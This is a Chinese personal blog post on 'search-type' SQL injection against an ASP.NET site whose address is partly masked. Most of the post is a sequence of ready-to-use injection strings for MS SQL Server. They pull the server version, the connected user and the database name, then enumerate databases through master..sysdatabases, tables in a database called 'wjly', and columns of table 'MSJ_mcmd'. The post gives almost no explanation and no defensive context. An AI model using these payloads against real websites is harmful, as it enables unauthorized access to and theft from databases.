搜索型字符注入 - 技术文摘 - F4usT's BloG

About

若世有仙魔二道，我必三跪九叩行万里，以求拜仙为师，若仙不收我，我必入魔，屠尽武林正道以明志。若魔已不收我，我必戮尽仙魔以雪耻。

By F4usT.

Jul

18

搜索型字符注入

0 Comments
技术文摘
发布:admin
引用:0
浏览:

SQL注入：http://www.*****.cn/ZW_index.aspx
搜索注入
1、基本信息
数据库版本：
2011%' and 1=(select @@version) and '%'=''
数据库连接用户：
2011%' and user>0 and '%'='

数据库：
2011%' and db_name()>0 and '%'='

2、暴库
2011%' and 1=(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases)) and '%'='
3、暴表
2011%' and 1=(select top 1 name from wjly..sysobjects where xtype='u' and name not in (select top 1 name from wjly..sysobjects where xtype='u')) and '%'='
4、暴列名
2011%' and 1=(select col_name(object_id('MSJ_mcmd'),1)) and '%'=

字符搜索型注入。

Tags: ASP.NET 注入

点击这里获取该日志的TrackBack引用地址

相关文章:

安全性异常 ,请求类型的权限已失败。2011-7-18 15:38:54
针对aspx木马可以读取iis站点信息，跨网站目录的临时解决方法2010-12-24 10:35:50
关于ASP.NET中由于无法创建应用程序域，因此未能执行请求解决方法2010-12-17 10:51:7
防注入绕过十一照2010-12-14 15:47:32
无忧源码网修改版注入漏洞2010-11-17 16:9:17
Could not load file or assembly 'System.Web.Extensions, Version=1.0.61025.02010-11-8 13:24:6

Post Comment.

站点统计

About The Theme

Easy Blue Theme 是一个简单的以中文为主的模板，目前支持Zbloe和Dt两种博客核心程序，该版本为alpha1.0版本。
该主题支持以下核心的浏览器：（本博客不支持IE6）

About Me

若世有仙魔二道，我必三跪九叩行万里，以求拜仙为师，若仙不收我，我必入魔，屠尽武林正道以明志。若魔已不收我，我必戮尽仙魔以雪耻。

By F4usT.

Powered By Z-Blog 1.8 Walle Build 100427.Copyright F4usT's BloG Your WebSite. Some Rights Reserved. Archiver